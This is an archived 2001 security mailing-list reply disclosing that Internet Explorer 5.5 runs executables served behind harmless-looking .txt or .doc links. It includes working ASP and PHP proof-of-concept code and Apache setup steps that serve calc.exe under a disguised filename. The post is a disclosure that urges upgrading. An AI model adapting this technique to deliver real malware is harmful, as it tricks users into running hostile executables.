RE: File extensions spoofable in MSIE download dialog

From: Jonathan G. Lampe (jonathanat_private)
Date: Thu Nov 29 2001 - 10:34:50 PST

Next message: Sandor W. Sklar: "RE: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"

Previous message: chef: "Re: File extensions spoofable in MSIE download dialog"
In reply to: StatiC: "RE: File extensions spoofable in MSIE download dialog"
Next in thread: staticat_private: "Re: File extensions spoofable in MSIE download dialog"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I have confirmed Jouko Pynnonen's and StatiC's findings that IE 5.5 sp 2 
allows executables to run as soon as a user has elected to open what 
appears to be a normally harmless ".txt" file.  (IE 5.5 trusts the filename 
provided in the link over the filename suggested by the header's filename 
tag and/or the use of an "application/octet-stream" content type.)

This bug/hole should be a compelling reason for anyone still running IE 5.5 
or less to either upgrade to IE 6.0  (which still did not appear to have 
this problem when last checked) or finally make the move to  Netscape, 
Opera, etc.  (It's about as much work no matter which company/version you 
choose.)

Here is the ASP equivalent code to StatiC's php tidbit (tested under both 
IIS 4 and 5):

<%

Const adTypeBinary = 1
Dim strFilePath

Response.ContentType = "application/octet-stream"
Response.AddHeader "Content-Disposition","attachment; filename=calc.exe"

strFilePath = Server.MapPath(".") & "\calc.exe"

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath

Response.BinaryWrite objStream.Read

objStream.Close
Set objStream = Nothing

%>

Additionally, you can see this code in action here:

http://208.212.86.151/test.doc

(Note that the bug/hole does not just "trust" .txt extensions - .doc, .log 
are but a few of the other ones you can slip by most users.)

- Jonathan Lampe - jonathanat_private - Standard Networks, Inc.-  608-227-6100
(Thanks to Stephen Nickels for the public posting.)

At 08:51 PM 11/28/2001, you wrote:
>I was playing with apache configs a few months ago and noticed a similar 
>issue with IE5.5.  The procodure below will cause IE5.5 to display the 
>open dialog for readme.txt but once opened, it executes immediately on 
>IE5.5 sp2 with no hint that it is really getting an executable file called 
>calc.exe.  I only tested it with IE5.5.
>
>With an apache/php server add .txt to the already existing .php extension 
>in the apache.conf file, so that apache will recognise .txt extensions as 
>php script files.
>
>1. Copy the real windows calc.exe from a windows system to the html root dir.
>
>2. Copy the readme.txt file below to the same html root dir.
>
>3. go to the url http://yourserver/readme.txt
>
>You will see the same behavior mentioned in the previous alert.
>
>FILE <readme.txt> BEGIN ----
><?php
>Header("Content-type: application/octet-stream");
>Header("Content-Disposition: attachment; filename=calc.exe");
>readfile("calc.exe");
>?>
>FILE <readme.txt> END ----
>
>Why does microsoft think it is wise to trust the filename in the url over 
>what the header content-type is set to for display purposes since the 
>content-type seems to take priority for what will really happen with the file.
>
>StatiC

Next message: Sandor W. Sklar: "RE: *ALERT* BID 3581: Wu-Ftpd File Globbing Heap Corruption Vulnerability"
Previous message: chef: "Re: File extensions spoofable in MSIE download dialog"
In reply to: StatiC: "RE: File extensions spoofable in MSIE download dialog"
Next in thread: staticat_private: "Re: File extensions spoofable in MSIE download dialog"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Nov 29 2001 - 13:10:34 PST